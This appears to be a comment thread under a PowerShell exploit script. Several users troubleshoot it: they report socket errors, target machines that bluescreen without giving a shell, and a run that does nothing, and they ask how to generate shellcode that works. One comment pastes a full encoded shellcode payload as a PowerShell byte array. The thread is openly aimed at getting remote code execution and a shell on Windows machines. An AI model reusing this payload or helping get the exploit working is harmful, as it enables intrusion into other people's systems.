wath type of shellcode to  use x86orx64 
im trying x86 but no luck
also i have a error : COMMENTAIRES : socket error, exploit may fail
    [Byte[]]  $payload = [Byte[]](0xb8,0xe0,0x20,0xa7,0x98,0xdb,0xd1,0xd9,0x74,0x24,0xf4,0x5a,0x29,0xc9,0xb1,0x42,0x31,0x42,0x12,0x83,0xc2,0x04,0x03,0xa2,0x2e,0x45,0x6d,0xfb,0xc4,0x12,0x57,0x8f,0x3e,0xd1,0x59,0xbd,0x8d,0x6e,0xab,0x88,0x96,0x1b,0xba,0x3a,0xdc,0x6a,0x31,0xb1,0x94,0x8e,0xc2,0x83,0x50,0x24,0xaa,0x2b,0xea,0x0c,0x6b,0x64,0xf4,0x05,0x78,0x23,0x05,0x37,0x81,0x32,0x65,0x3c,0x12,0x90,0x42,0xc9,0xae,0xe4,0x01,0x99,0x18,0x6c,0x17,0xc8,0xd2,0xc6,0x0f,0x87,0xbf,0xf6,0x2e,0x7c,0xdc,0xc2,0x79,0x09,0x17,0xa1,0x7b,0xe3,0x69,0x4a,0x4a,0x3b,0x75,0x18,0x29,0x7b,0xf2,0x67,0xf3,0xb3,0xf6,0x66,0x34,0xa0,0xfd,0x53,0xc6,0x13,0xd6,0xd6,0xd7,0xd7,0x7c,0x3c,0x19,0x03,0xe6,0xb7,0x15,0x98,0x6c,0x9d,0x39,0x1f,0x98,0xaa,0x46,0x94,0x5f,0x44,0xcf,0xee,0x7b,0x88,0xb1,0x2d,0x31,0xb8,0x18,0x66,0xbf,0x5d,0xd3,0x44,0xa8,0x13,0xaa,0x46,0xc5,0x79,0xdb,0xc8,0xea,0x82,0xe4,0x7e,0x51,0x78,0xa0,0xff,0x82,0x62,0xa5,0x78,0x2e,0x46,0x18,0x6f,0xc1,0x79,0x63,0x90,0x57,0xc0,0x94,0x07,0x04,0xa6,0x84,0x96,0xbc,0x05,0xf7,0x36,0x59,0x01,0x82,0x35,0xc4,0xa3,0xe4,0xe6,0x22,0x49,0x7c,0xf0,0x7d,0xb2,0x2b,0xf9,0x08,0x8e,0x84,0xba,0xa3,0xac,0x68,0x01,0x34,0xac,0x56,0x2b,0xd3,0xad,0x69,0x34,0xdc,0x45,0xce,0xeb,0x03,0xb5,0x86,0x89,0x70,0x86,0x30,0x7f,0xac,0x60,0xe0,0x5b,0x56,0xf9,0xfa,0xcc,0x0e,0xd9,0xdc,0x2c,0xc7,0x7b,0x72,0x55,0x36,0x13,0xf8,0xcd,0x5d,0xc3,0x68,0x5e,0xf1,0x73,0x49,0x6f,0xc4,0xfb,0xc5,0xab,0xda,0x72,0x34,0x82,0x30,0xd6,0xe4,0xb4,0xe6,0x29,0xda,0x06,0xc7,0x85,0x24,0x3d,0xcf)

Hi, Can you tell me how I can make shellcode to use this? I use some generators  in exploit-db but not work. Thanks.
Hello,
after trying multiple payload codes (x64,x86) I could not make it to work.
The machine always gets a bluescreen with no result (shell).

Different python code was able to work and exploit.
Can you please confirm?

Thanks,
Dvir
Has anyone succeeded running it from a command line?
I renamed it to e.ps1 for my convenience.

C:\>powershell -ExecutionPolicy ByPass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\> .\e.ps1
PS C:\>

And thats it...